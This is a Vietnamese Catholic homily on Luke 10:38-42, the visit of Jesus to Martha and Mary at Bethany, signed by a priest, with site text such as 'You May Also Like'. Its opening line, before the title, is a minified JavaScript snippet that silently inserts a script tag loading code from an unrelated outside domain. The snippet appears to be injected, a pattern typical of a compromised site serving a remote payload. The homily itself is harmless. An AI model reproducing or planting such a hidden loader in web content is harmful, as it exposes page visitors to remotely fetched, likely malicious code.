;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); GIA ĐÌNH BÊTANIA ĐÓN TIẾP CHÚA – Xitô PS

GIA ĐÌNH BÊTANIA ĐÓN TIẾP CHÚA

SUY NIỆM THỨ 4 TUẦN XXVII

LC 10, 38-42

Lời Chúa hôm nay tường thuật cho chúng ta việc Đức Giêsu và các môn đệ ghé thăm gia đình Bêtania, một gia đình khá giả, được Chúa chọn làm nơi tá túc mỗi dịp truyền giáo ở phía nam. Gia đình có ba chị em: chị cả là Matta, cô em là Maria và cậu út là Lazarô, tất cả đều được Chúa yêu mến, riêng Lazarô thì được Đức Giêsu và các môn đệ Ngài coi như bạn thân.

Hôm đó, Thầy trò ghé thăm một cách đột xuất. cậu út Lazarô có lẽ đi vắng nên không được nhắc tới. Chỉ có hai chị em ở nhà, được Chúa và các môn đệ ghé thăm, hai chị em rất đỗi vui mừng, chị cả Matta cuống quýt tất bật lo việc bếp núc chuẩn bị bữa ăn cho đoàn thầy trò hơn cả chục người. Còn cô Maria vẫn tỉnh bở coi như không có chuyện gì để lo, để làm, cô ung dung ngồi nghe Thầy thuyết pháp với các môn đệ.

Việc bếp núc bề bộn, một tay xoay xở đủ chuyện, bà chị Matta xăm xăm bước tới, nét mặt căng thẳng, nói một mạch không kịp lấy hơi: “Thưa Thầy, em con để mình con phục vụ, mà Thầy không để ý tới con sao? Xin Thầy báo nó giúp con một tay chứ” (Lc 10, 40). Qua thái độ và giọng nói của người chị cả, xem ra hơi quá quắt, chắc bà chị bực tức đứa em ham nghe Lời Chúa giảng, nghe mãi nghe hoài mà không chán! Vả lại cô em này, tuy biết bà chị đang tất bật việc bếp núc, nhưng làm bộ như không thấy, và có lẽ có lúc cũng không dễ nghe lời chị! Chính vì thế, mà chị Matta mới thỉnh cầu: “Xin Thầy báo nó giúp con một tay”. Mà chỉ có Thầy bảo nó mới nghe. Nếu Chúa bảo Maria xuống bếp giúp chị, chắc cô ta phải đi ngay, ai ngờ Chúa không bảo Maria giúp chị, mà lại nói với cô Matta: “Matta ơi! Chị băn khoăn lo lắng nhiều chuyện quá! Chỉ có một chuyện cần thiết mà thôi. Maria đã chọn phần tốt nhất và không bị lấy đi” (Lc 10, 41-42). 

Lời Chúa đáp xem ra không được tế nhị, hơi cứng cỏi, chắc cô Matta buồn tủi lắm! Nhưng chúng ta cũng đừng vội suy nghĩ lung tung, mà phải như Đức Maria hằng ghi nhớ và suy niệm trong lòng. Vậy cần gẫm suy:

  • Tình thân hữu: Gia đình Bêtania được Chúa coi như thân thích ruột thịt! Vì thân nên chúa mới thành thật bộc lộ tâm tư tình cảm và sứ vụ của mình: chẳng hạn với đức mẹ Maria trong dịp gia đình thánh gia lên đền thánh chầu lễ, lúc Chúa 12 tuổi. Mãn kỳ lễ Chúa ở lại, mà cha mẹ chẳng hay biết, sau ba ngày vất vả tìm kiếm mới gặp thấy, Mẹ Ngài liền nói: “Sao con lại đối xử với cha mẹ như vậy? con thấy không, cha con và mẹ đây đã phải cực lòng tìm con. Ngài đáp: sao cha mẹ lại tìm con? Cha mẹ không biết con có bổn phận ở nhà Cha con sao? Nhưng ông bà không hiểu lời Ngài vừa nói” (Lc 2, 48-49). Còn Mẹ Ngài hằng ghi nhớ tất cả những điều ấy trong lòng (xLc 2, 51). Một dịp khác, mẹ và anh em Đức Giêsu đến gặp Ngài mà không làm sao gặp được, vì dân chúng quá đông. Người ta báo cho Ngài: “Thưa Thầy, có mẹ và anh em Thầy đang đứng ngoài kia, nuốn gặp Thầy”. Ngài đáp lại: “Mẹ tôi và anh em tôi chính là những ai nghe Lời Thiên Chúa và đem ra thực hành” (Lc 8, 21). Với hai tình huống vừa trích dẫn trên, thoạt nghe, chúng ta nghĩ rằng: Lời nói và xử sự của Chúa lúc bấy giờ xem ra thật cứng cỏi, hững hờ, thiếu quan tâm đến những lo lắng của Đức Mẹ và thân nhân tương tự như thái độ và lời nói của Chúa hôm nay đối với cô Matta vậy. Tại sao? Tất nhiên phải có lý do của Chúa. Và đây là lý do:
  • Vì Lời Chúa: Quả thế, vì Maria ham nghe Lời Chúa mà quên mất việc phụ giúp chị. Còn Matta vì không được nghe Lời Chúa nên ganh tỵ với cô em. Vì phải bảo vệ và đề cao giá trị của Lời Chúa, nên Đức Giêsu không thể nhẹ nhàng với Matta được! Chân lý phải được công bố trọn vẹn, nếu vì nể nang mà làm nhẹ giá trị của chân lý thì chân lý không còn là chân lý nữa.

Sau khi Lời Chúa được Thầy Giêsu đề cao đúng mức như thế thì mọi chuyện đều được hóa giải ổn thỏa. Hai chị em cùng nhau xuống bếp phục vụ bữa ăn. Rồi sau bữa ăn, hai chị em cùng ngồi lắng nghe Thầy Giêsu thuyết pháp, và sau này, mỗi lần Thầy ghé thăm, Matta chỉ dọn bữa ăn đơn giản, tranh thủ tối đa để cả nhà cùng được nghe giảng. Mọi người đã chọn phần tốt nhất và sẽ không bị lấy đi.

Ước gì Lời Chúa và Phụng vụ hôm nay cùng với lời chuyển cầu của các thánh gia đình Bêtania, xin Chúa ban cho tất cả chúng con biết đón rước Chúa với cả tâm hồn ân cần lắng nghe và phục vụ nhiệt thành hân hoan. Amen.

 

LM PHÊRÔ KHOA-LÊ TRỌNG NGỌC

You May Also Like

Trả lời

X